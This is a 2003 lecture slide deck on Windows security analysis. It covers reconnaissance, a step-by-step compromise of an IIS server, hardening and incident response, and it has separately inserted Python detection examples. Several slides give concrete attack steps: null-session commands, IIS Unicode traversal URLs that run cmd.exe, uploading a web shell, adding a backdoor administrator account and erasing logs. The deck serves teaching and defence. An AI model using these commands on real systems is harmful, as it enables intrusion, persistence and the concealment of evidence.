Windows Security Analysis
Computer Science E-Commerce Security ‘2003’
Matthew Cook, http://escarpment.net/
(52 slides)


Slide 1

Windows Security Analysis
Computer Science E-Commerce Security ‘2003’

Matthew Cook
http://escarpment.net/

Slide 2

Introduction

Loughborough University
http://www.lboro.ac.uk/computing/

Bandwidth Management Advisory Service
http://bmas.ja.net/

Slide 3

Windows Security Analysis

Introduction
Step-by-step Machine Compromise
Preventing Attack
Incident Response
Further Reading

Slide 4

Introduction

Basic Security Overview

Slide 5

Physical Security

Secure Location
BIOS restrictions
Password Protection
Boot Devices
Case Locks
Case Panels

Slide 6

Security Threats

Denial of Service
Theft of information
Modification
Fabrication (Spoofing or Masquerading)

Slide 7

Security Threats…

Why a compromise can occur:
Physical Security Holes
Software Security Holes
Incompatible Usage Security Holes
Social Engineering
Complacency

Slide 8

The Easiest Security Improvement

Good passwords
Usernames and Passwords are the primary security defence
Use a password that is easy to type to avoid ‘Shoulder Surfers’
Use the first letters from song titles, song lyrics or film quotations

Slide 9

Can you buy Security?

“This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?”

Bruce Schneier

Slide 10

Step-by-step Machine Compromise

Why, where, how?

Slide 11

Background

Reasons for Attack:
Personal Issues
Political Statement
Financial Gain (Theft of money, information)
Learning Experience
DoS (Denial of Service)
Support for Illegal Activity

Slide 12

Gathering Information

Companies House
Internet Search
URL: http://www.google.co.uk
Whois
URL: http://www.netsol.com/cgi-bin/whois/whois
A Whois query can provide:
– The Registrant
– The Domain Names Registered
– The Administrative, Technical and Billing Contact
– Record updated and created date stamps
– DNS Servers for the Domain

Slide 13

Gathering Information…

Use Nslookup or dig
dig @<dns server> <machine address>
Different query types available:
– A – Network address
– Any – All or Any Information available
– Mx – Mail exchange records
– Soa – Zone of Authority
– Hinfo – Host information
– Axfr – Zone Transfer
– Txt – Additional strings

Slide 14

Identifying System Weakness

Many products available:
Nmap
Nessus
Pandora
Pwdump
L0pht Crack
Null Authentication

Slide 15

Nmap

Port Scanning Tool
Stealth scanning, OS Fingerprinting
Open Source
Runs under Unix based OS
Port development for Win32
URL: http://www.insure.org/nmap/

Slide 16

Nmap

Slide 17

Nessus

Remote security scanner
Very comprehensive
Frequently updated modules
Testing of DoS attacks
Open Source
Win32 and Java Client
URL: http://nessus.org/

Slide 18

pwdump

Version 3 (e = encrypted)
Developed by Phil Staubs and Erik Hjelmstad
Based on pwdump and pwdump2
URL: http://www.ebiz-tech.com/html/pwdump.html
Needs Administrative Privileges
Extracts hashes even if syskey is installed
Extract from remote machines
Identifies accounts with no password
Self contained utility

Slide 19

L0pht Crack

Password Auditing and Recovery
Crack Passwords from many sources
Registration $249
URL: http://www.atstake.com/research/lc3/

Slide 20

L0pht Crack

Crack Passwords from:
Local Machine
Remote Machine
SAM File
SMB Sniffer
PWDump file

Slide 21

Nmap Analysis

nmap -sP 158.125.0.0/16 - Ping scan!

nmap -sS 158.125.0.0/16 - Stealth scan

Slide 22

Nmap Analysis…

TCP Connect Scan
Completes a ‘Three Way Handshake’
Very noisy (Detection by IDS)

Slide 23

Nmap Analysis…

TCP SYN Scan
Half open scanning (Full port TCP connection not made)
Less noisy than the TCP Connect Scan

Slide 24

Nmap Analysis…

TCP FIN Scan
– FIN Packet sent to target port
– RST returned for all closed ports
– Mostly works on UNIX based TCP/IP Stacks

TCP Xmas Tree Scan
– Sends a FIN, URG and PUSH packet
– RST returned for all closed ports

TCP Null Scan
– Turns off all flags
– RST returned for all closed ports

UDP Scan
– UDP Packet sent to target port
– “ICMP Port Unreachable” for closed ports
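As an added detection example (not code from the slides), the following Python classifies an unsolicited TCP probe by the flag combinations the scan types above are defined by, states the reply the slides describe for closed ports (with the Windows-stack caveat behind "mostly works on UNIX based stacks"), and reports a source that sweeps many ports with one technique. The packet records are constructed; in practice they would come from a capture or firewall log.

```python
"""Classify TCP probes by flag combination and flag port sweeps (added example)."""
from collections import defaultdict

# TCP header flag bits (RFC 793 layout).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def classify_probe(flags):
    """Name the scan technique a single unsolicited TCP segment matches.

    A segment carrying ACK belongs to an existing exchange rather than a new
    connection attempt, so it is not classified as a probe here.
    """
    if flags & ACK:
        return "OTHER"
    if flags == 0:
        return "NULL"                 # Null scan: every flag turned off
    if flags == (FIN | PSH | URG):
        return "XMAS"                 # Xmas Tree scan: FIN, URG and PUSH lit up
    if flags == FIN:
        return "FIN"                  # FIN scan
    if flags == SYN:
        return "SYN"                  # SYN (half-open) and connect() scans start identically
    return "OTHER"


def expected_reply(kind, port_open, windows_stack):
    """Reply the probed port gives, per the slides, plus the Windows caveat.

    Windows-family stacks answer FIN/Xmas/Null probes with RST whatever the
    port state, so those three techniques only tell open from closed on
    UNIX-style stacks; a SYN probe is answered the same way everywhere.
    """
    if kind == "SYN":
        return "SYN/ACK" if port_open else "RST"
    if kind in ("FIN", "XMAS", "NULL"):
        if windows_stack:
            return "RST"
        return "no reply" if port_open else "RST"
    return "n/a"


def detect_sweeps(packets, port_threshold=5):
    """Group probes by (source, technique); report sources touching many ports.

    packets: iterable of (src_ip, dst_port, tcp_flags) tuples.
    Returns {(src_ip, technique): distinct_port_count} for sources at or over
    the threshold.
    """
    seen = defaultdict(set)
    for src, dport, flags in packets:
        kind = classify_probe(flags)
        if kind != "OTHER":
            seen[(src, kind)].add(dport)
    return {k: len(v) for k, v in seen.items() if len(v) >= port_threshold}


# Constructed sample: one host Xmas-scans six ports, another makes two ordinary
# connection attempts (SYN to 80 and 443), which stays under the threshold.
SAMPLE_PACKETS = (
    [("10.0.0.9", p, FIN | PSH | URG) for p in (21, 22, 23, 25, 80, 139)]
    + [("10.0.0.5", 80, SYN), ("10.0.0.5", 443, SYN)]
)

if __name__ == "__main__":
    print(detect_sweeps(SAMPLE_PACKETS))   # {('10.0.0.9', 'XMAS'): 6}
```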

Slide 25

Null Authentication

Null Authentication:
net use \\camford\IPC$ "" /u:""
Famous tools like ‘Red Button’
net view \\camford

List of Users, groups and shares
Last logged on date
Last password change
Much more…

Slide 26

Exploiting the Security Hole

Using IIS Unicode/Directory Traversal
/scripts/../../winnt/system32/cmd.exe /c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Displays the listing of c: in browser

Copy cmd.exe to /scripts/root.exe
Echo upload.asp
GET /scripts/root.exe /c+echo+[blah]>upload.asp
Upload cmdasp.asp using upload.asp

Still vulnerable on 24% of E-Commerce servers

Slide 27

Gaining ‘Root’

Cmdasp.asp provides a cmd shell in the SYSTEM context

Increase in privileges is now simple

ISAPI.dll – RevertToSelf (Horovitz)
Version 2 coded by Foundstone
http://camford/scripts/idq.dll?
Patch Bulletin: MS01-26
NOT included in Windows 2000 SP2

Slide 28

Backdoor Access

Create several user accounts
Net user iisservice <pass> /ADD
Net localgroup administrators iisservice /ADD
Add root shells on high end ports
Tini is 3Kb in size
Add backdoors to ‘Run’ registry keys

Slide 29

System Alteration

Web page alteration
Information Theft
Enable services
Add VNC

Creating a Warez Server
Net start msftpsvc
Check access
Upload file 1Mb in size
Advertise as a warez server

Slide 30

Audit Trail Removal

Many machines have auditing disabled
Main problems are IIS logs
DoS IIS before logs sync to disc
Erase logs from hard disc
Erasing Eventlog harder

IDS Systems
Network Monitoring at firewall

Slide 31

Preventing Attack

How to stop the attack from happening and how to limit the damage from crackers!

Slide 32

NetBIOS/SMB Services

NetBIOS Browsing Request [UDP 137]
NetBIOS Browsing Response [UDP 138]
NetBIOS Communications [TCP 135]
CIFS [TCP 139, 445; UDP 445]
Port 445 Windows 2000 only
Block ports at firewall
Netstat -A

Slide 33

NetBIOS/SMB Services…

To disable NetBIOS
1. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties.
2. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window

Slide 34

NetBIOS/SMB Services…

Disable Null Authentication
HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
REG_DWORD set to 0, 1 or 2!
HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
REG_DWORD set to 0 or 1
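An added audit example, not from the slides, that ties the NetBIOS/SMB port list and the netstat check of slide 32 to the RestrictAnonymous setting above: it parses `netstat -an` style output for the listed listeners and reports whether a null session could still enumerate the host. The netstat text is constructed; the value meanings for the LSA RestrictAnonymous key follow Microsoft KB 246261.

```python
"""Check NetBIOS/SMB exposure and the null-session policy (added example)."""
import re

# Ports from the NetBIOS/SMB Services slide, keyed by (protocol, port).
NETBIOS_SMB_PORTS = {
    ("UDP", 137): "NetBIOS name service (browsing request)",
    ("UDP", 138): "NetBIOS datagram service (browsing response)",
    ("TCP", 135): "RPC endpoint mapper (NetBIOS communications)",
    ("TCP", 139): "CIFS over NetBIOS session service",
    ("TCP", 445): "CIFS direct hosting (Windows 2000 onwards)",
    ("UDP", 445): "CIFS direct hosting (Windows 2000 onwards)",
}

# HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous (KB 246261);
# value 2 exists on Windows 2000 only.
RESTRICT_ANONYMOUS = {
    0: "none: null sessions may enumerate users, groups and shares",
    1: "null sessions may not enumerate SAM accounts and names",
    2: "no access without explicit anonymous permissions",
}

# One 'netstat -an' row: proto, local addr:port, foreign addr, optional state.
_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def bound_sockets(netstat_text):
    """Parse netstat output into (proto, local_addr, port, state) tuples."""
    rows = []
    for line in netstat_text.splitlines():
        m = _ROW.match(line)
        if m:
            proto, addr, port, _foreign, state = m.groups()
            rows.append((proto, addr, int(port), state or ""))
    return rows


def exposed_netbios_services(netstat_text):
    """Return NetBIOS/SMB sockets reachable from the network.

    TCP counts only in LISTENING state (UDP rows carry no state); sockets
    bound to loopback are skipped because the network cannot reach them.
    """
    exposed = []
    for proto, addr, port, state in bound_sockets(netstat_text):
        if addr.startswith("127."):
            continue
        if proto == "TCP" and state != "LISTENING":
            continue
        name = NETBIOS_SMB_PORTS.get((proto, port))
        if name:
            exposed.append((proto, port, name))
    return exposed


def null_session_findings(restrict_anonymous, exposed):
    """A null session needs a reachable SMB endpoint (TCP 139 or 445) and a
    RestrictAnonymous value below 2; value 1 only hides SAM enumeration."""
    smb_reachable = any(proto == "TCP" and port in (139, 445) for proto, port, _ in exposed)
    return {
        "smb_reachable": smb_reachable,
        "policy": RESTRICT_ANONYMOUS.get(restrict_anonymous, "unknown value"),
        "null_session_enumeration_possible": smb_reachable and restrict_anonymous < 2,
    }


# Constructed 'netstat -an' output from a Windows 2000 host with sharing enabled.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    158.125.3.4:139        158.125.7.9:1122       ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:138            *:*
  UDP    0.0.0.0:445            *:*
"""

if __name__ == "__main__":
    found = exposed_netbios_services(SAMPLE_NETSTAT)
    print(null_session_findings(0, found))
```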

Slide 35

Operating System Patching

Operating Systems do contain bugs, and patches are a common method of distributing these fixes.

A patch or hot fix usually contains a fix for one discovered bug.

Service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in the soon to be released SP4 for Windows 2000.

Slide 36

Operating System Patching…

Only install patches after you have tested them in a development environment.

Only install patches obtained direct from the vendor.

Install security patches as soon as possible after released.

Install feature patches as and when needed.

Automate patch collection and installation as much as possible (QChain).

Slide 37

Operating System Patching…

Use automated patching technology:
SUS – Microsoft Software Update Service
SMS – Microsoft Systems Management Server
Ghost – Symantec imaging software.

And other application deployment software:
Lights out Distribution
Deferred installation

Slide 38

Baseline Security Analyzer

Freely available from Microsoft
Written by Shavlik Technologies as a direct result of Code Red attacks
A GUI to HFNetChk (v3.81)
Improved feature set
Integrated SUS functionality

Slide 39

Baseline Security Analyzer…

MBSA v1.1 supports the following host OS:
Windows 2000 Professional / Server
Windows XP Home / Professional

Windows .NET not officially supported
Windows NT not supported as host OS

Remote scanning available

Slide 40

Baseline Security Analyzer…

What applications does MBSA scan?
Operating system
Internet Explorer > 5.01
Microsoft Office 2000 and 2002
Media Player > 6.4
Internet Information Services 4.0 and 5.0
SQL Server 7.0 and 2000
Exchange Server 5.5 and 2000

Slide 41

IPSec

IP security
Linux Connectivity using FreeS/WAN
Mainly for wireless use
WEP encryption cracked
URL: http://www.freeswan.org/
URL: http://airsnort.sourceforge.net/

Slide 42

Recent Worms

Sadmind/IIS – Directory Traversal (Unicode Exploit)
CodeRed – ida/idq buffer overflow
CodeGreen – ida/idq buffer overflow
Nimda – Directory Traversal (Unicode Exploit)
Slammer – MS SQL Server transaction control

Slide 43

Sadmind/IIS

2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -
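An added detection example, not code from the slides, serving both the IIS Unicode/Directory Traversal slide and the Sadmind/IIS log entry above: it parses IIS W3C extended log lines in the field order of that entry, canonicalises the requested path the way the vulnerable IIS did (the overlong sequence %c0%af decodes to "/", turning "..%c0%af.." into "../.."), and flags requests that climb above the web root or call cmd.exe/root.exe. The log excerpt is constructed.

```python
"""Flag Unicode/directory-traversal requests in IIS W3C logs (added example)."""
from urllib.parse import unquote_to_bytes


def decode_overlong_utf8(raw):
    """Reproduce the faulty IIS canonicalisation.

    A two-byte UTF-8 sequence is accepted even when it is an 'overlong'
    encoding of an ASCII character, so C0 AF decodes to '/'. Sequences that
    denote a genuine non-ASCII code point are copied through unchanged.
    """
    out, i = bytearray(), 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)
            if cp < 0x80:          # overlong: ASCII in disguise
                out.append(cp)
                i += 2
                continue
        out.append(b)
        i += 1
    return bytes(out)


def analyse_uri(stem):
    """Canonicalise a cs-uri-stem as the vulnerable server did and explain why
    it is suspicious. Returns (canonical_path, [reasons])."""
    path = decode_overlong_utf8(unquote_to_bytes(stem)).decode("latin-1").lower()
    path = path.replace("\\", "/")
    depth, escapes = 0, False
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            escapes = escapes or depth < 0     # climbed above the URL root
        elif seg and seg != ".":
            depth += 1
    reasons = []
    if escapes:
        reasons.append("traversal above web root")
    if path.rsplit("/", 1)[-1] in ("cmd.exe", "root.exe"):
        reasons.append("command interpreter requested")
    return path, reasons


def scan_iis_log(text):
    """Parse W3C extended log lines in the field order of the slide's entry
    (date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query
    sc-status ...) and return the flagged requests."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 10:
            continue
        client, stem, status = fields[2], fields[7], fields[9]
        path, reasons = analyse_uri(stem)
        if reasons:
            hits.append({"client": client, "path": path, "status": status, "reasons": reasons})
    return hits


# Constructed log excerpt (addresses and payload made up; format as on the slide).
SAMPLE_LOG = """\
2001-05-03 22:34:49 203.67.1.2 - 158.125.3.4 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
2001-05-03 22:35:10 203.67.1.2 - 158.125.3.4 80 GET /scripts/root.exe /c+echo+defaced>../wwwroot/default.htm 200 -
2001-05-03 22:36:02 10.1.1.7 - 158.125.3.4 80 GET /index.asp - 200 -
2001-05-03 22:36:30 10.1.1.8 - 158.125.3.4 80 GET /images/logo.gif - 304 -
"""

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```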

Slide 44

IDS Snort

IDS – Intrusion Detection System
Libpcap packet sniffer and logger
Originally developed for the Unix platforms
Open Source
Port to Win32 available (Release 1.8.1)
Installation on Win32 in under 30 minutes
Run on your IIS server or standalone

Slide 45

IDS Snort…

Snort can detect:
Stealth Port Scans
CGI Attacks
Front Page Extensions Attacks
ICMP Activity
SMTP Activity
SQL Activity
SMB Probes

Slide 46

Incident Response

What to do when something does go wrong!

Slide 47

Incident Response…

Don’t Panic!
Unplug the network
Get a notebook
Back-up the system and keep the Back-ups
Restrict use of email
Look for information
Investigate the cause
Request help and assistance.

Slide 48

Incident Response…

Important to return to service swiftly
– Do not jeopardize security
– If in doubt, re-build
– Perform forensics on a backup

Keep documentation and evidence
Contact local CERT if investigation proves non worm/script kiddie activity.

Slide 49

Further Reading

Garfinkel, S. Web Security & Commerce. O’Reilly [ISBN 1-56592-269-7]

Hassler, V. Security Fundamentals for E-Commerce. Artech House [ISBN 1-58053-108-3]

Huth, M. R. A. Secure Communicating Systems. Cambridge University Press [ISBN 0-52180-731-X]

Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]

Slide 50

Useful Books, Tools and URLs

Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.)

Incident Response. (Kenneth R. van Wyk, Richard Forno.)

Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al.)

Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)

Slide 51

Useful Books, Tools and URLs

Microsoft Security Website
http://www.microsoft.com/security/

Computer Security Incident Response Team
http://www.cert.org/csirts/csirt_faq.html

JANET CERT
http://www.ja.net/cert/

Bugtraq Mailing List
http://online.securityfocus.com/

Slide 52

Questions

Slides available at:
http://escarpment.net/